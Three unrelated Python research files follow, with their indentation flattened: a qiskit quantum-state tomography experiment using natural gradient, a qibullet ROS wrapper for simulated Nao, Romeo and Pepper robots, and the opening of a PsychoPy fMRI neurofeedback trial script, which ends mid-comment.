| source | python |
|---|---|
compare_Walltoall_qng.py
|
import qiskit
import numpy as np
import sys
sys.path.insert(1, '../')
import qtm.base, qtm.constant, qtm.ansatz, qtm.fubini_study, qtm.encoding, qtm.loss
import importlib
import multiprocessing
importlib.reload(qtm.base)
importlib.reload(qtm.constant)
importlib.reload(qtm.ansatz)
importlib.reload(qtm.fubini_study)
def run_walltoall(num_layers, num_qubits):
n_walltoall = qtm.ansatz.calculate_n_walltoall(num_qubits)
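    # each layer presumably contributes 3 * num_qubits single-qubit rotation
    # angles plus n_walltoall parameters for the all-to-all entangling block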
thetas = np.ones(num_layers* 3 * num_qubits + num_layers*n_walltoall)
psi = 2*np.random.rand(2**num_qubits)-1
psi = psi / np.linalg.norm(psi)
qc = qiskit.QuantumCircuit(num_qubits, num_qubits)
qc.initialize(psi)
loss_values = []
thetass = []
for i in range(0, 400):
if i % 20 == 0:
print('W_alltoall: (' + str(num_layers) + ',' + str(num_qubits) + '): ' + str(i))
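        # G is the Fubini-Study metric of the ansatz at the current parameters
        # (as returned by qtm.fubini_study.qng); it preconditions the gradient
        # in the quantum natural gradient update below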
G = qtm.fubini_study.qng(qc.copy(), thetas, qtm.ansatz.create_Walltoall_layerd_state, num_layers)
grad_loss = qtm.base.grad_loss(
qc,
qtm.ansatz.create_Walltoall_layerd_state,
thetas, num_layers = num_layers)
        thetas -= qtm.constant.learning_rate*(np.linalg.inv(G) @ grad_loss)
thetass.append(thetas.copy())
qc_copy = qtm.ansatz.create_Walltoall_layerd_state(qc.copy(), thetas, num_layers)
loss = qtm.loss.loss_basis(qtm.base.measure(qc_copy, list(range(qc_copy.num_qubits))))
loss_values.append(loss)
traces = []
fidelities = []
np.savetxt("../../experiments/tomography/tomography_walltoall_" + str(num_layers) +
"/" + str(num_qubits) + "/loss_values_qng.csv",
loss_values,
delimiter=",")
np.savetxt("../../experiments/tomography/tomography_walltoall_" + str(num_layers) +
"/" + str(num_qubits) + "/thetass_qng.csv",
thetass,
delimiter=",")
for thetas in thetass:
# Get |psi~> = U_target|000...>
qc = qiskit.QuantumCircuit(num_qubits, num_qubits)
qc = qtm.ansatz.create_Walltoall_layerd_state(
qc, thetas, num_layers=num_layers).inverse()
psi_hat = qiskit.quantum_info.Statevector.from_instruction(qc)
# Calculate the metrics
trace, fidelity = qtm.base.get_metrics(psi, psi_hat)
traces.append(trace)
fidelities.append(fidelity)
    print('Writing ... ' + str(num_layers) + ' layers, ' + str(num_qubits) +
          ' qubits')
np.savetxt("../../experiments/tomography/tomography_walltoall_" + str(num_layers) +
"/" + str(num_qubits) + "/traces_qng.csv",
traces,
delimiter=",")
np.savetxt("../../experiments/tomography/tomography_walltoall_" + str(num_layers) +
"/" + str(num_qubits) + "/fidelities_qng.csv",
fidelities,
delimiter=",")
if __name__ == "__main__":
# creating thread
num_layers = [1, 2, 3, 4, 5]
num_qubits = [2, 6]
t_walltoalls = []
for i in num_layers:
for j in num_qubits:
t_walltoalls.append(
multiprocessing.Process(target=run_walltoall, args=(i, j)))
for t_walltoall in t_walltoalls:
t_walltoall.start()
for t_walltoall in t_walltoalls:
t_walltoall.join()
print("Done!")
|
ros_wrapper.py
|
#!/usr/bin/env python
# coding: utf-8
import os
import sys
import atexit
import pybullet
from qibullet.camera import Camera
from qibullet.camera import CameraRgb
from qibullet.camera import CameraDepth
from qibullet.nao_virtual import NaoVirtual
from qibullet.romeo_virtual import RomeoVirtual
from qibullet.pepper_virtual import PepperVirtual
from qibullet.base_controller import PepperBaseController
from threading import Thread
try:
import rospy
import roslib
import roslaunch
import tf2_ros
from cv_bridge import CvBridge
from sensor_msgs.msg import Image
from sensor_msgs.msg import CameraInfo
from sensor_msgs.msg import JointState
from sensor_msgs.msg import LaserScan
from std_msgs.msg import Header
from std_msgs.msg import Empty
from naoqi_bridge_msgs.msg import JointAnglesWithSpeed
from naoqi_bridge_msgs.msg import PoseStampedWithSpeed
from geometry_msgs.msg import TransformStamped
from geometry_msgs.msg import Twist
from nav_msgs.msg import Odometry
MISSING_IMPORT = None
except ImportError as e:
MISSING_IMPORT = str(e)
TOP_OPTICAL_FRAME = "CameraTop_optical_frame"
BOTTOM_OPTICAL_FRAME = "CameraBottom_optical_frame"
DEPTH_OPTICAL_FRAME = "CameraDepth_optical_frame"
class RosWrapper:
"""
Virtual class defining the basis of a robot ROS wrapper
"""
def __init__(self):
"""
Constructor
"""
if MISSING_IMPORT is not None:
raise pybullet.error(MISSING_IMPORT)
self.spin_thread = None
self._wrapper_termination = False
self.image_bridge = CvBridge()
self.front_info_msg = dict()
self.bottom_info_msg = dict()
self.depth_info_msg = dict()
self.roslauncher = None
self.transform_broadcaster = tf2_ros.TransformBroadcaster()
atexit.register(self.stopWrapper)
def stopWrapper(self):
"""
Stops the ROS wrapper
"""
self._wrapper_termination = True
try:
assert self.spin_thread is not None
assert isinstance(self.spin_thread, Thread)
            assert self.spin_thread.is_alive()
self.spin_thread.join()
except AssertionError:
pass
if self.roslauncher is not None:
self.roslauncher.stop()
print("Stopping roslauncher")
def launchWrapper(self, virtual_robot, ros_namespace, frequency=200):
"""
Launches the ROS wrapper
Parameters:
virtual_robot - The instance of the simulated model
ros_namespace - The ROS namespace to be added before the ROS topics
            advertised and subscribed
frequency - The frequency of the ROS rate that will be used to pace
the wrapper's main loop
"""
if MISSING_IMPORT is not None:
raise pybullet.error(MISSING_IMPORT)
self.virtual_robot = virtual_robot
self.ros_namespace = ros_namespace
self.frequency = frequency
rospy.init_node(
"qibullet_wrapper",
anonymous=True,
disable_signals=False)
# Upload the robot description to the ros parameter server
try:
if isinstance(self.virtual_robot, PepperVirtual):
robot_name = "pepper"
elif isinstance(self.virtual_robot, NaoVirtual):
robot_name = "nao"
elif isinstance(self.virtual_robot, RomeoVirtual):
robot_name = "romeo"
else:
raise pybullet.error(
"Unknown robot type, wont set robot description")
package_path = roslib.packages.get_pkg_dir("naoqi_driver")
urdf_path = package_path + "/share/urdf/" + robot_name + ".urdf"
with open(urdf_path, 'r') as file:
robot_description = file.read()
rospy.set_param("/robot_description", robot_description)
except IOError as e:
raise pybullet.error(
"Could not retrieve robot descrition: " + str(e))
# Launch the robot state publisher
robot_state_publisher = roslaunch.core.Node(
"robot_state_publisher",
"robot_state_publisher")
self.roslauncher = roslaunch.scriptapi.ROSLaunch()
self.roslauncher.start()
self.roslauncher.launch(robot_state_publisher)
# Initialize the ROS publisher and subscribers
self._initPublishers()
self._initSubscribers()
# Launch the wrapper's main loop
self._wrapper_termination = False
self.spin_thread = Thread(target=self._spin)
self.spin_thread.start()
def _initPublishers(self):
"""
ABSTRACT INTERNAL METHOD, needs to be implemented in each daughter
class. Initializes the ROS publishers
"""
raise NotImplementedError
def _initSubscribers(self):
"""
ABSTRACT INTERNAL METHOD, needs to be implemented in each daughter
class. Initializes the ROS subscribers
"""
raise NotImplementedError
def _spin(self):
"""
ABSTRACT INTERNAL METHOD, needs to be implemented in each daughter
class. Designed to emulate a ROS spin method
"""
raise NotImplementedError
def _broadcastOdometry(self, odometry_publisher):
"""
INTERNAL METHOD, computes an odometry message based on the robot's
position, and broadcast it
Parameters:
odometry_publisher - The ROS publisher for the odometry message
"""
# Send Transform odom
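        # Broadcast the odom -> base_link transform over tf2, then publish a
        # matching nav_msgs/Odometry message with the base pose and velocity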
x, y, theta = self.virtual_robot.getPosition()
odom_trans = TransformStamped()
odom_trans.header.frame_id = "odom"
odom_trans.child_frame_id = "base_link"
odom_trans.header.stamp = rospy.get_rostime()
odom_trans.transform.translation.x = x
odom_trans.transform.translation.y = y
odom_trans.transform.translation.z = 0
quaternion = pybullet.getQuaternionFromEuler([0, 0, theta])
odom_trans.transform.rotation.x = quaternion[0]
odom_trans.transform.rotation.y = quaternion[1]
odom_trans.transform.rotation.z = quaternion[2]
odom_trans.transform.rotation.w = quaternion[3]
self.transform_broadcaster.sendTransform(odom_trans)
# Set up the odometry
odom = Odometry()
odom.header.stamp = rospy.get_rostime()
odom.header.frame_id = "odom"
odom.pose.pose.position.x = x
odom.pose.pose.position.y = y
odom.pose.pose.position.z = 0.0
odom.pose.pose.orientation = odom_trans.transform.rotation
odom.child_frame_id = "base_link"
[vx, vy, vz], [wx, wy, wz] = pybullet.getBaseVelocity(
self.virtual_robot.getRobotModel(),
self.virtual_robot.getPhysicsClientId())
odom.twist.twist.linear.x = vx
odom.twist.twist.linear.y = vy
odom.twist.twist.angular.z = wz
odometry_publisher.publish(odom)
def _broadcastCamera(self, image_publisher, info_publisher):
"""
INTERNAL METHOD, computes the image message and the info message of the
active camera and publishes them into the ROS framework
Parameters:
image_publisher: The ROS publisher for the Image message,
corresponding to the image delivered by the active camera
info_publisher: The ROS publisher for the CameraInfo message,
corresponding to the parameters of the active camera
"""
try:
camera = self.virtual_robot.getActiveCamera()
assert camera is not None
assert camera.getFrame() is not None
camera_image_msg = self.image_bridge.cv2_to_imgmsg(
camera.getFrame())
camera_image_msg.header.frame_id = camera.getCameraLink().getName()
# Fill the camera info message
camera_info_msg = CameraInfo()
camera_info_msg.distortion_model = "plumb_bob"
camera_info_msg.header.frame_id = camera.getCameraLink().getName()
camera_info_msg.width = camera.getResolution().width
camera_info_msg.height = camera.getResolution().height
camera_info_msg.D = [0.0, 0.0, 0.0, 0.0, 0.0]
camera_info_msg.K = camera._getCameraIntrinsics()
camera_info_msg.R = [1, 0, 0, 0, 1, 0, 0, 0, 1]
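            # Build the 3x4 projection matrix P by inserting a zero fourth
            # column into the 3x3 intrinsic matrix K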
camera_info_msg.P = list(camera_info_msg.K)
camera_info_msg.P.insert(3, 0.0)
camera_info_msg.P.insert(7, 0.0)
camera_info_msg.P.append(0.0)
# Check if the retrieved image is RGB or a depth image
if isinstance(camera, CameraDepth):
camera_image_msg.encoding = "16UC1"
else:
camera_image_msg.encoding = "bgr8"
# Publish the image and the camera info
image_publisher.publish(camera_image_msg)
info_publisher.publish(camera_info_msg)
except AssertionError:
pass
def _broadcastJointState(self, joint_state_publisher, extra_joints=None):
"""
INTERNAL METHOD, publishes the state of the robot's joints into the ROS
framework
Parameters:
joint_state_publisher - The ROS publisher for the JointState
message, describing the state of the robot's joints
extra_joints - A dict, describing extra joints to be published. The
dict should respect the following syntax:
{"joint_name": joint_value, ...}
"""
msg_joint_state = JointState()
msg_joint_state.header = Header()
msg_joint_state.header.stamp = rospy.get_rostime()
msg_joint_state.name = list(self.virtual_robot.joint_dict)
msg_joint_state.position = self.virtual_robot.getAnglesPosition(
msg_joint_state.name)
try:
assert isinstance(extra_joints, dict)
for name, value in extra_joints.items():
msg_joint_state.name += [name]
msg_joint_state.position += [value]
except AssertionError:
pass
joint_state_publisher.publish(msg_joint_state)
def _jointAnglesCallback(self, msg):
"""
INTERNAL METHOD, callback triggered when a message is received on the
/joint_angles topic
Parameters:
            msg - a ROS message containing joint angles with a speed
            associated to them. The type of the message is the following:
            naoqi_bridge_msgs::JointAnglesWithSpeed. That type can be found in
            the ros naoqi software stack
"""
joint_list = msg.joint_names
position_list = list(msg.joint_angles)
if len(msg.speeds) != 0:
velocity = list(msg.speeds)
else:
velocity = msg.speed
self.virtual_robot.setAngles(joint_list, position_list, velocity)
class NaoRosWrapper(RosWrapper):
"""
Class describing a ROS wrapper for the virtual model of Nao, inheriting
from the RosWrapperClass
"""
def __init__(self):
"""
Constructor
"""
RosWrapper.__init__(self)
def launchWrapper(self, virtual_nao, ros_namespace, frequency=200):
"""
Launches the ROS wrapper for the virtual_nao instance
Parameters:
virtual_nao - The instance of the simulated model
ros_namespace - The ROS namespace to be added before the ROS topics
            advertised and subscribed
frequency - The frequency of the ROS rate that will be used to pace
the wrapper's main loop
"""
RosWrapper.launchWrapper(
self,
virtual_nao,
ros_namespace,
frequency)
def _initPublishers(self):
"""
INTERNAL METHOD, initializes the ROS publishers
"""
self.front_cam_pub = rospy.Publisher(
self.ros_namespace + '/camera/front/image_raw',
Image,
queue_size=10)
self.front_info_pub = rospy.Publisher(
self.ros_namespace + '/camera/front/camera_info',
CameraInfo,
queue_size=10)
self.bottom_cam_pub = rospy.Publisher(
self.ros_namespace + '/camera/bottom/image_raw',
Image,
queue_size=10)
self.bottom_info_pub = rospy.Publisher(
self.ros_namespace + '/camera/bottom/camera_info',
CameraInfo,
queue_size=10)
self.joint_states_pub = rospy.Publisher(
'/joint_states',
JointState,
queue_size=10)
self.odom_pub = rospy.Publisher(
'odom',
Odometry,
queue_size=10)
def _initSubscribers(self):
"""
INTERNAL METHOD, initializes the ROS subscribers
"""
rospy.Subscriber(
'/joint_angles',
JointAnglesWithSpeed,
self._jointAnglesCallback)
def _broadcastCamera(self):
"""
INTERNAL METHOD, overloading @_broadcastCamera in RosWrapper
"""
camera = self.virtual_robot.getActiveCamera()
try:
assert camera is not None
if camera.getCameraId() == NaoVirtual.ID_CAMERA_TOP:
RosWrapper._broadcastCamera(
self,
self.front_cam_pub,
self.front_info_pub)
elif camera.getCameraId() == NaoVirtual.ID_CAMERA_BOTTOM:
RosWrapper._broadcastCamera(
self,
self.bottom_cam_pub,
self.bottom_info_pub)
except AssertionError:
pass
def _broadcastJointState(self, joint_state_publisher):
"""
INTERNAL METHOD, publishes the state of the robot's joints into the ROS
framework, overloading @_broadcastJointState in RosWrapper
Parameters:
joint_state_publisher - The ROS publisher for the JointState
message, describing the state of the robot's joints (for API
consistency)
"""
RosWrapper._broadcastJointState(self, joint_state_publisher)
def _spin(self):
"""
INTERNAL METHOD, designed to emulate a ROS spin method
"""
rate = rospy.Rate(self.frequency)
try:
while not self._wrapper_termination:
rate.sleep()
self._broadcastJointState(self.joint_states_pub)
self._broadcastOdometry(self.odom_pub)
self._broadcastCamera()
except Exception as e:
print("Stopping the ROS wrapper: " + str(e))
class RomeoRosWrapper(RosWrapper):
"""
Class describing a ROS wrapper for the virtual model of Romeo, inheriting
from the RosWrapperClass
"""
def __init__(self):
"""
Constructor
"""
RosWrapper.__init__(self)
def launchWrapper(self, virtual_romeo, ros_namespace, frequency=200):
"""
Launches the ROS wrapper for the virtual_romeo instance
Parameters:
virtual_romeo - The instance of the simulated model
ros_namespace - The ROS namespace to be added before the ROS topics
            advertised and subscribed
frequency - The frequency of the ROS rate that will be used to pace
the wrapper's main loop
"""
RosWrapper.launchWrapper(
self,
virtual_romeo,
ros_namespace,
frequency)
def _initPublishers(self):
"""
INTERNAL METHOD, initializes the ROS publishers
"""
self.right_cam_pub = rospy.Publisher(
self.ros_namespace + '/camera/right/image_raw',
Image,
queue_size=10)
self.right_info_pub = rospy.Publisher(
self.ros_namespace + '/camera/right/camera_info',
CameraInfo,
queue_size=10)
self.left_cam_pub = rospy.Publisher(
self.ros_namespace + '/camera/left/image_raw',
Image,
queue_size=10)
self.left_info_pub = rospy.Publisher(
self.ros_namespace + '/camera/left/camera_info',
CameraInfo,
queue_size=10)
self.depth_cam_pub = rospy.Publisher(
self.ros_namespace + '/camera/depth/image_raw',
Image,
queue_size=10)
self.depth_info_pub = rospy.Publisher(
self.ros_namespace + '/camera/depth/camera_info',
CameraInfo,
queue_size=10)
self.joint_states_pub = rospy.Publisher(
'/joint_states',
JointState,
queue_size=10)
self.odom_pub = rospy.Publisher(
'odom',
Odometry,
queue_size=10)
def _initSubscribers(self):
"""
INTERNAL METHOD, initializes the ROS subscribers
"""
rospy.Subscriber(
'/joint_angles',
JointAnglesWithSpeed,
self._jointAnglesCallback)
def _broadcastCamera(self):
"""
INTERNAL METHOD, overloading @_broadcastCamera in RosWrapper
"""
camera = self.virtual_robot.getActiveCamera()
try:
assert camera is not None
if camera.getCameraId() == RomeoVirtual.ID_CAMERA_RIGHT:
RosWrapper._broadcastCamera(
self,
self.right_cam_pub,
self.right_info_pub)
elif camera.getCameraId() == RomeoVirtual.ID_CAMERA_LEFT:
RosWrapper._broadcastCamera(
self,
self.left_cam_pub,
self.left_info_pub)
elif camera.getCameraId() == RomeoVirtual.ID_CAMERA_DEPTH:
RosWrapper._broadcastCamera(
self,
self.depth_cam_pub,
self.depth_info_pub)
except AssertionError:
pass
def _broadcastJointState(self, joint_state_publisher):
"""
INTERNAL METHOD, publishes the state of the robot's joints into the ROS
framework, overloading @_broadcastJointState in RosWrapper
Parameters:
joint_state_publisher - The ROS publisher for the JointState
message, describing the state of the robot's joints (for API
consistency)
"""
RosWrapper._broadcastJointState(self, joint_state_publisher)
def _spin(self):
"""
INTERNAL METHOD, designed to emulate a ROS spin method
"""
rate = rospy.Rate(self.frequency)
try:
while not self._wrapper_termination:
rate.sleep()
self._broadcastJointState(self.joint_states_pub)
self._broadcastOdometry(self.odom_pub)
self._broadcastCamera()
except Exception as e:
print("Stopping the ROS wrapper: " + str(e))
class PepperRosWrapper(RosWrapper):
"""
Class describing a ROS wrapper for the virtual model of Pepper, inheriting
from the RosWrapperClass
"""
def __init__(self):
"""
Constructor
"""
RosWrapper.__init__(self)
def launchWrapper(self, virtual_pepper, ros_namespace, frequency=200):
"""
Launches the ROS wrapper for the virtual_pepper instance
Parameters:
virtual_pepper - The instance of the simulated model
ros_namespace - The ROS namespace to be added before the ROS topics
            advertised and subscribed
frequency - The frequency of the ROS rate that will be used to pace
the wrapper's main loop
"""
RosWrapper.launchWrapper(
self,
virtual_pepper,
ros_namespace,
frequency)
def _initPublishers(self):
"""
INTERNAL METHOD, initializes the ROS publishers
"""
self.front_cam_pub = rospy.Publisher(
self.ros_namespace + '/camera/front/image_raw',
Image,
queue_size=10)
self.front_info_pub = rospy.Publisher(
self.ros_namespace + '/camera/front/camera_info',
CameraInfo,
queue_size=10)
self.bottom_cam_pub = rospy.Publisher(
self.ros_namespace + '/camera/bottom/image_raw',
Image,
queue_size=10)
self.bottom_info_pub = rospy.Publisher(
self.ros_namespace + '/camera/bottom/camera_info',
CameraInfo,
queue_size=10)
self.depth_cam_pub = rospy.Publisher(
self.ros_namespace + '/camera/depth/image_raw',
Image,
queue_size=10)
self.depth_info_pub = rospy.Publisher(
self.ros_namespace + '/camera/depth/camera_info',
CameraInfo,
queue_size=10)
self.laser_pub = rospy.Publisher(
self.ros_namespace + "/laser",
LaserScan,
queue_size=10)
self.joint_states_pub = rospy.Publisher(
'/joint_states',
JointState,
queue_size=10)
self.odom_pub = rospy.Publisher(
'odom',
Odometry,
queue_size=10)
def _initSubscribers(self):
"""
INTERNAL METHOD, initializes the ROS subscribers
"""
rospy.Subscriber(
'/joint_angles',
JointAnglesWithSpeed,
self._jointAnglesCallback)
rospy.Subscriber(
'/cmd_vel',
Twist,
self._velocityCallback)
rospy.Subscriber(
'/move_base_simple/goal',
PoseStampedWithSpeed,
self._moveToCallback)
rospy.Subscriber(
'/move_base_simple/cancel',
Empty,
self._killMoveCallback)
def _broadcastLasers(self, laser_publisher):
"""
INTERNAL METHOD, publishes the laser values in the ROS framework
Parameters:
laser_publisher - The ROS publisher for the LaserScan message,
corresponding to the laser info of the pepper robot (for API
consistency)
"""
if not self.virtual_robot.laser_manager.isActive():
return
scan = LaserScan()
scan.header.stamp = rospy.get_rostime()
scan.header.frame_id = "base_footprint"
        # -120 degrees to +120 degrees
scan.angle_min = -2.0944
scan.angle_max = 2.0944
        # 240 degrees FoV, 61 points (blind zones included)
scan.angle_increment = (2 * 2.0944) / (15.0 + 15.0 + 15.0 + 8.0 + 8.0)
# Detection ranges for the lasers in meters, 0.1 to 3.0 meters
scan.range_min = 0.1
scan.range_max = 3.0
# Fill the lasers information
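        # Scan layout: 15 right + 8 blind + 15 front + 8 blind + 15 left = 61
        # ranges; the blind zones between the lasers are padded with -1 below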
right_scan = self.virtual_robot.getRightLaserValue()
front_scan = self.virtual_robot.getFrontLaserValue()
left_scan = self.virtual_robot.getLeftLaserValue()
if isinstance(right_scan, list):
scan.ranges.extend(list(reversed(right_scan)))
scan.ranges.extend([-1]*8)
if isinstance(front_scan, list):
scan.ranges.extend(list(reversed(front_scan)))
scan.ranges.extend([-1]*8)
if isinstance(left_scan, list):
scan.ranges.extend(list(reversed(left_scan)))
laser_publisher.publish(scan)
def _broadcastCamera(self):
"""
INTERNAL METHOD, overloading @_broadcastCamera in RosWrapper
"""
camera = self.virtual_robot.getActiveCamera()
try:
assert camera is not None
if camera.getCameraId() == PepperVirtual.ID_CAMERA_TOP:
RosWrapper._broadcastCamera(
self,
self.front_cam_pub,
self.front_info_pub)
elif camera.getCameraId() == PepperVirtual.ID_CAMERA_BOTTOM:
RosWrapper._broadcastCamera(
self,
self.bottom_cam_pub,
self.bottom_info_pub)
elif camera.getCameraId() == PepperVirtual.ID_CAMERA_DEPTH:
RosWrapper._broadcastCamera(
self,
self.depth_cam_pub,
self.depth_info_pub)
except AssertionError:
pass
def _broadcastJointState(self, joint_state_publisher):
"""
INTERNAL METHOD, publishes the state of the robot's joints into the ROS
framework, overloading @_broadcastJointState in RosWrapper
Parameters:
joint_state_publisher - The ROS publisher for the JointState
message, describing the state of the robot's joints (for API
consistency)
"""
RosWrapper._broadcastJointState(
self,
joint_state_publisher,
extra_joints={"WheelFL": 0.0, "WheelFR": 0.0, "WheelB": 0.0})
def _velocityCallback(self, msg):
"""
INTERNAL METHOD, callback triggered when a message is received on the
/cmd_vel topic
Parameters:
msg - a ROS message containing a Twist command
"""
self.virtual_robot.move(msg.linear.x, msg.linear.y, msg.angular.z)
def _moveToCallback(self, msg):
"""
INTERNAL METHOD, callback triggered when a message is received on the
'/move_base_simple/goal' topic. It allows to move the robot's base
Parameters:
msg - a ROS message containing a pose stamped with a speed
associated to it. The type of the message is the following:
naoqi_bridge_msgs::PoseStampedWithSpeed. That type can be found in
the ros naoqi software stack
"""
x = msg.pose_stamped.pose.position.x
y = msg.pose_stamped.pose.position.y
theta = pybullet.getEulerFromQuaternion([
msg.pose_stamped.pose.orientation.x,
msg.pose_stamped.pose.orientation.y,
msg.pose_stamped.pose.orientation.z,
msg.pose_stamped.pose.orientation.w])[-1]
speed = msg.speed_percentage *\
PepperBaseController.MAX_LINEAR_VELOCITY +\
PepperBaseController.MIN_LINEAR_VELOCITY
frame = msg.referenceFrame
self.virtual_robot.moveTo(
x,
y,
theta,
frame=frame,
speed=speed,
_async=True)
def _killMoveCallback(self, msg):
"""
INTERNAL METHOD, callback triggered when a message is received on the
'/move_base_simple/cancel' topic. This callback is used to stop the
robot's base from moving
Parameters:
msg - an empty ROS message, with the Empty type
"""
self.virtual_robot.moveTo(0, 0, 0, _async=True)
def _spin(self):
"""
INTERNAL METHOD, designed to emulate a ROS spin method
"""
rate = rospy.Rate(self.frequency)
try:
while not self._wrapper_termination:
rate.sleep()
self._broadcastJointState(self.joint_states_pub)
self._broadcastOdometry(self.odom_pub)
self._broadcastLasers(self.laser_pub)
self._broadcastCamera()
except Exception as e:
print("Stopping the ROS wrapper: " + str(e))
|
morphingMovies.py
|
# This code should be run in console room computer to display the feedback morphings
from __future__ import print_function, division
import os
if 'watts' in os.getcwd():
main_dir = "/home/watts/Desktop/ntblab/kailong/rtSynth_rt/"
else:
main_dir="/Users/kailong/Desktop/rtEnv/rtSynth_rt/"
import sys
sys.path.append(main_dir)
sys.path.append(main_dir+"expScripts/feedback/")
from psychopy import visual, event, core, logging, gui, data, monitors
from psychopy.hardware.emulator import launchScan, SyncGenerator
from PIL import Image
import string
import fmrisim as sim
import numpy as np
import pandas as pd
import pylink
from tqdm import tqdm
import time
import re
import logging
import threading
import argparse
alpha = string.ascii_uppercase
from rtCommon.subjectInterface import SubjectInterface
from rtCommon.wsRemoteService import WsRemoteService, parseConnectionArgs
from rtCommon.utils import installLoggers
from rtCommon.cfg_loading import mkdir,cfg_loading
class SubjectService:
def __init__(self, args, webSocketChannelName='wsSubject'):
"""
Uses the WsRemoteService framework to parse connection-related args and establish
a connection to a remote projectServer. Instantiates a local version of
SubjectInterface to handle client requests coming from the projectServer connection.
Args:
args: Argparse args related to connecting to the remote server. These include
"-s <server>", "-u <username>", "-p <password>", "--test",
"-i <retry-connection-interval>"
            webSocketChannelName: The websocket url extension used to connect and communicate
to the remote projectServer, 'wsSubject' will connect to 'ws://server:port/wsSubject'
"""
self.subjectInterface = SubjectInterface(subjectRemote=False)
self.wsRemoteService = WsRemoteService(args, webSocketChannelName)
self.wsRemoteService.addHandlerClass(SubjectInterface, self.subjectInterface)
def runDetached(self):
"""Starts the receiver in it's own thread."""
self.recvThread = threading.Thread(name='recvThread',
target=self.wsRemoteService.runForever)
self.recvThread.setDaemon(True)
self.recvThread.start()
argParser = argparse.ArgumentParser()
argParser.add_argument('-c', '--config', action="store", dest="config", default='sub001.ses2.toml', type=str, help='experiment file (.json or .toml)')
argParser.add_argument('-r', '--run', action="store", dest="run", default='1', type=str, help='current run')
# argParser.add_argument('-e', '--sess', action="store", dest="sess", default='1', type=str, help='current session')
argParser.add_argument('-s', action="store", dest="server", default="localhost:7777",
help="Server Address with Port [server:port]")
argParser.add_argument('-i', action="store", dest="interval", type=int, default=5,
help="Retry connection interval (seconds)")
argParser.add_argument('-u', '--username', action="store", dest="username", default='kp578',
help="rtcloud website username")
argParser.add_argument('-p', '--password', action="store", dest="password", default='kp578',
help="rtcloud website password")
argParser.add_argument('--test', default=False, action='store_true',
help='Use unsecure non-encrypted connection')
argParser.add_argument('--trying', default=False, action='store_true',
help='Use unsecure non-encrypted connection')
args = argParser.parse_args("")
args.trying=True
if args.trying:
scanmode = 'Test' # 'Scan' or 'Test' or None
screenmode = False # fullscr True or False
monitor_name = "testMonitor" #"testMonitor"
prange=20
else:
scanmode = 'Scan' # 'Scan' or 'Test' or None
screenmode = True # fullscr True or False
monitor_name = "scanner"
prange=20
if not re.match(r'.*:\d+', args.server):
print("Error: Expecting server address in the form <servername:port>")
argParser.print_help()
sys.exit()
# Check if the ssl certificate is valid for this server address
from rtCommon.projectUtils import login, certFile, checkSSLCertAltName, makeSSLCertFile
addr, _ = args.server.split(':')
if checkSSLCertAltName(certFile, addr) is False:
# Addr not listed in sslCert, recreate ssl Cert
makeSSLCertFile(addr)
cfg = cfg_loading(args.config)
sub = cfg.subjectName
run = int(args.run) # 1
sess = int(cfg.session)
cfg.feedback_expScripts_dir = f"{cfg.projectDir}expScripts/feedback/"
gui = not screenmode
scnWidth, scnHeight = monitors.Monitor(monitor_name).getSizePix()
frameTolerance = 0.001 # how close to onset before 'same' frame
TRduration=int(cfg.TR)
# mywin = visual.Window(
# size=[1280, 800], fullscr=screenmode, screen=0,
# winType='pyglet', allowGUI=False, allowStencil=False,
# monitor=monitor_name, color=[0,0,0], colorSpace='rgb', #color=[0,0,0]
# blendMode='avg', useFBO=True,
# units='height')
mywin = visual.Window(
size=[scnWidth - 100, scnHeight - 100], fullscr=screenmode, screen=1,
winType='pyglet', allowGUI=False, allowStencil=False,
monitor=monitor_name, color=[0,0,0], colorSpace='rgb', #color=[0,0,0]
blendMode='avg', useFBO=True,
units='height')
# similation specific
step=3 # in simulation, how quickly the morph change ramps up; this only matters for the simulation and has nothing to do with the real experiment
# trial_list designing parameters
parameterRange=np.arange(1,prange) # restricted range to save time for now; np.arange(1,20) defines the full range of parameters for preloading images. Preloading keeps the morphing smooth during feedback
tune=4 # this parameter controls how much to morph (how strong the morphing is); used in the preloading function. tune can range over (1, 6.15] when parameterRange is np.arange(1,20)
TrialNumber=180 # how many trials are required # test note: each trial is 14s, so 10 trials are 140s
## - design the trial list: the sequence of the different types of components:
## - e.g: ITI + waiting for fMRI signal + feedback (receive model output from feedbackReceiver.py)
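## - each trial below is built as: 6 TRs ITI + 3 TRs waiting + 5 TRs feedback + 6 TRs end ITI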
trial_list = pd.DataFrame(columns=['Trial','time','TR','state','newWobble'])
curTime=0
curTR=0
state=''
trial_list.append({'Trial':None,
'time':None,
'TR':None,
'state':None,
'newWobble':None},
ignore_index=True)
for currTrial in range(1,1+TrialNumber):
# ITI
for i in range(6): # should be 6TR=12s
trial_list=trial_list.append({'Trial':currTrial,
'time':curTime,
'TR':curTR,
'state':'ITI',
'newWobble':0},
ignore_index=True)
curTime=curTime+TRduration
curTR=curTR+1
# waiting for metric calculation
for i in range(3): # should be 3TR=6s
trial_list=trial_list.append({'Trial':currTrial,
'time':curTime,
'TR':curTR,
'state':'waiting',
'newWobble':0},
ignore_index=True)
curTime=curTime+TRduration
curTR=curTR+1
    # feedback trial: try to minimize the wobbling
for i in range(5): #5TR=10s
trial_list=trial_list.append({'Trial':currTrial,
'time':curTime,
'TR':curTR,
'state':'feedback',
'newWobble':1},
ignore_index=True)
curTime=curTime+TRduration
curTR=curTR+1
# end ITI
for i in range(6): # should be 6TR=12s
trial_list=trial_list.append({'Trial':currTrial,
'time':curTime,
'TR':curTR,
'state':'ITI',
'newWobble':0},
ignore_index=True)
curTime=curTime+TRduration
curTR=curTR+1
# parameters = np.arange(1,step*(sum((trial_list['newWobble']==1)*1)),step) #[1,2,3,4,5,6,7,8]
print('total trial number=',TrialNumber)
# print('neighboring morph difference=',tune)
print('preloaded parameter range=',parameterRange)
# print('used parameters=',parameters)
def sample(L,num=10):
    # This function uniformly samples the list down to num points
# e.g, if L is 0-99, num is 10, newList would be [9, 19, 29, 39, 49, 59, 69, 79, 89, 99]
# e.g, if L is 0-95, num is 10, newList would be [8, 18, 27, 37, 47, 56, 66, 75, 85, 95]
# e.g, if L is 0-5, num is 10, newList would be [0, 0, 0, 1, 2, 2, 3, 3, 4, 5]
sampleStep=len(L)/num
newList=[]
for i in range(1,num):
newList.append(L[int(i*sampleStep-1)])
newList.append(L[-1])
return newList
# preload image list for parameter from 1 to 19.
# def preloadimages(parameterRange=np.arange(1,20),tune=1):
# '''
# purpose:
# preload images into image object sequences corrresponding too each parameter
# each parameter corresponds to 40 image objects
# steps:
# To restate how the images are named:
# [benchBed/bedChair/bedTable/] _ [1-99] _ [5-39] .png
# [AD/AB/AC] _ [morphing degree] _ [angle to watch] .png
